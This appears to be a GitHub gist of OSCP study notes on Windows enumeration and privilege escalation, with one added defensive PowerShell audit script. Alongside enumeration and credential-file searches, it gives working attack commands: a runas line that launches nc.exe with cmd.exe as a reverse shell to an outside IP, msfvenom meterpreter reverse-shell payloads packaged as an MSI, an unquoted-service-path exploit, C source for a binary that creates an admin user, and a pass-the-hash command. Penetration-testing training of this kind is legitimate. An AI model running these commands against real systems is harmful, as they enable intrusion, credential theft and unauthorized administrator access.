@ssstonebraker
Created June 23, 2020 13:51
OSCP_Windows_Enumeration.md

[TOC]

Windows Initial Checks

Basic Info

hostname
systeminfo
whoami

Global path

If any directory in the SYSTEM %PATH% variable is writable by Authenticated Users, a privilege escalation path exists.

Many applications don't use a full path when loading executables or DLLs, so Windows searches the %PATH% directories in order.

If system32 is not the first entry in the path, this is bad.

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"

Applications

wmic product get name, version, vendor

Patch Level

systeminfo  
wmic qfe get Caption,Description,HotFixID,InstalledOn  

Users and Groups

Info about current user

whoami  
echo %USERNAME%  
net user %USERNAME%

Local

List all Local Users

net user 

List all Local Groups

net localgroup  

Check who is a member of the local group "Administrators"

net localgroup Administrators

Adding users and groups

net user kali kali1234 /add
net localgroup administrators kali /add
net localgroup "Remote Desktop Users" kali /add

Domain

Users in a domain

net user /domain  

Groups in a domain

net group /domain  
net group "<Group Name>" /domain  

Check RID

wmic useraccount where (name='Guest') get name,sid

Network Info

Firewall

netsh firewall show state  
netsh firewall show config  
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Network Details

ipconfig /all  
route print  
arp -a  
netstat -ano

Find Readable/Writable Files and Directories

accesschk.exe -uws "Everyone" "C:\Program Files"

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Show Unmounted Disks

mountvol

mountvol c:\test \\?\Volume{93131ba8-0000-0000-0000-100000000000}\

Enumerating Device Drivers and Kernel Modules

Requires powershell

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Binaries That AutoElevate

If these are set we could run an MSI to elevate privileges

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Scheduled Tasks

Basic info

schtasks /query /fo LIST

List only task names

schtasks /query /fo LIST 2>nul | findstr TaskName

Verbose

schtasks /query /fo LIST /v  

Parsing Verbose output

Copy the output, save it as a text file on the Kali machine, and filter for tasks that run as SYSTEM:

grep "SYSTEM\|Task To Run" schtask.txt | grep -B 1 SYSTEM  

Tasks on disk

dir c:\windows\tasks\  
dir c:\windows\system32\tasks\  

Info on specific task

schtasks /query /v /fo list /tn "\System Maintenance"

Passwords in files

https://pentestlab.blog/tag/privilege-escalation/page/3/

cmdkey

If there are entries, we may be able to use runas as a user whose credentials are stored in Windows Credential Manager

cmdkey /list 
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"  

SAM Files

%SYSTEMROOT%\repair\SAM  
%SYSTEMROOT%\System32\config\RegBack\SAM  
%SYSTEMROOT%\System32\config\SAM  
%SYSTEMROOT%\repair\system  
%SYSTEMROOT%\System32\config\SYSTEM  
%SYSTEMROOT%\System32\config\RegBack\system  

Raw text search

findstr /si password *.xml *.ini *.txt
findstr /si "pass pwd" *.ini  

dir /s *pass* == *cred* == *vnc* == *.config*  
findstr /spin "password" *.*  

Common files to check

c:\sysprep.inf  
c:\sysprep\sysprep.xml  
c:\unattend.xml  
%WINDIR%\Panther\Unattend\Unattended.xml  
%WINDIR%\Panther\Unattended.xml  

dir /b /s unattend.xml  
dir /b /s web.config  
dir /b /s sysprep.inf  
dir /b /s sysprep.xml  
dir /b /s *pass*  

dir c:\*vnc.ini /s /b  
dir c:\*ultravnc.ini /s /b   
dir c:\ /s /b | findstr /i "vnc.ini"  

Windows Registry Queries

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"  

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  

SNMP Parameters

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"  

Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  

Search for password in registry

reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s  

AlwaysInstallElevated

If the system is 64-bit (and your shell is 32-bit), use: %SystemRoot%\Sysnative\reg.exe

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated  
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated  

Exploitation

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows VM.

Windows VM

1. Place setup.msi in C:\Temp.
2. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi

Services

Find Non-Standard Services

Requires powershell

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr /v /i "Microsoft" | findstr /v /i "windows" | findstr /v /i "vmware"

Unquoted Service Path

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
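An added PowerShell audit (not from the original gist) that combines two of the checks above, the writable %PATH% directory check from "Global path" and the unquoted service path check here, using Get-Acl in place of accesschk; the list of broad principals and the write-bit mask are my assumptions.

```powershell
# Added audit script, not from the original gist. A directory is flagged when a broad principal
# may create files there (WriteData) or holds GENERIC_WRITE / GENERIC_ALL; deny ACEs are ignored.
$WeakPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
$WriteBits = 0x2 -bor 0x40000000 -bor 0x10000000   # WriteData | GENERIC_WRITE | GENERIC_ALL

function Test-WritableByNonAdmin([string]$Path) {
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs, e.g. Authenticated Users (OI)(CI)(IO)(M) on C:\, do not apply to the folder itself
        if (([int]$ace.PropagationFlags -band 2) -ne 0) { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteBits) -ne 0) { return $true }
    }
    return $false
}

# Check 1: the machine-wide PATH from the registry value the gist queries (not this process's copy)
function Get-WeakPathEntries {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    $entries = @((Get-ItemProperty -Path $key -Name Path).Path -split ';' | Where-Object { $_ } |
        ForEach-Object { [Environment]::ExpandEnvironmentVariables($_) })
    if ($entries[0] -notlike "$env:SystemRoot\system32*") { Write-Warning "system32 is not first in PATH: $($entries[0])" }
    foreach ($dir in $entries) {
        if (Test-WritableByNonAdmin $dir) { [pscustomobject]@{ Kind = 'PATH'; Service = ''; Path = $dir; WritableDir = $dir } }
    }
}

# Check 2: auto-start services with unquoted paths containing spaces. Windows probes C:\Program.exe,
# C:\Program Files\Foo.exe, ... before the real binary, so every directory on that walk is tested.
function Get-WeakUnquotedServices {
    Get-CimInstance Win32_Service | Where-Object {
        $_.StartMode -eq 'Auto' -and $_.PathName -and $_.PathName -notlike '"*' -and
        $_.PathName -notlike "$env:SystemRoot\*" -and $_.PathName -match ' '
    } | ForEach-Object {
        $svc = $_
        $parts = $svc.PathName -split ' '
        $dirs = 1..($parts.Count) | ForEach-Object { Split-Path -Parent ($parts[0..($_ - 1)] -join ' ') } |
            Where-Object { $_ } | Sort-Object -Unique
        foreach ($dir in $dirs) {
            if (Test-WritableByNonAdmin $dir) {
                [pscustomobject]@{ Kind = 'Service'; Service = $svc.Name; Path = $svc.PathName; WritableDir = $dir }
            }
        }
    }
}

@(Get-WeakPathEntries) + @(Get-WeakUnquotedServices) | Format-Table -AutoSize
```

Each hit is a heuristic (deny ACEs are not evaluated), so confirm it with icacls on the directory before acting. The fix on the defender's side is to quote the service binary path and tighten the ACL on any flagged directory.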

Kali VM

Note: On an x64 machine, use bat2exe.bat to create a 64-bit executable

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in C:\Program Files\Unquoted Path Service.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Start mode of service

wmic service where caption="Serviio" get name, caption, state, startmode

Permissions for all services

accesschk.exe -uwcqv * /accepteula

Weak Service Permissions

Find Services that can be modified

accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Power Users" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula

Permission for service exe file

icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

wmic

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\service_exes.txt

echo "" > c:\windows\temp\exe_permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\service_exes.txt) do cmd.exe /c icacls "%a" >> c:\windows\temp\exe_permissions.txt

sc

Service Details

sc qc <Service Name>

Service Permissions

accesschk.exe -ucqv <Service Name>  

Output Service Info

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  
FOR /F %i in (Servicenames.txt) DO echo %i  

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

File Permissions

Check permissions on the file (look for a W (write) or F (full control) entry granted to a non-admin principal) and replace the binary if possible

icacls scsiaccess.exe

Registry Key permissions

subinacl /keyreg HKEY_LOCAL_MACHINE/software/microsoft

Exe to add a user to the system

Write and compile malicious exe file to add a user to the system as an admin

Contents of adduser.c

#include <stdlib.h>

int main(void)
{
    int i;

    /* system() hands each command to cmd.exe; both only succeed when the
       process running this binary already holds administrator rights. */
    i = system("net user evil Ev!lpass /add");
    i = system("net localgroup administrators evil /add");

    return 0;
}

Compile adduser.c on kali

sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe

Pass the Hash

Use the NTLM hash to authenticate

pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd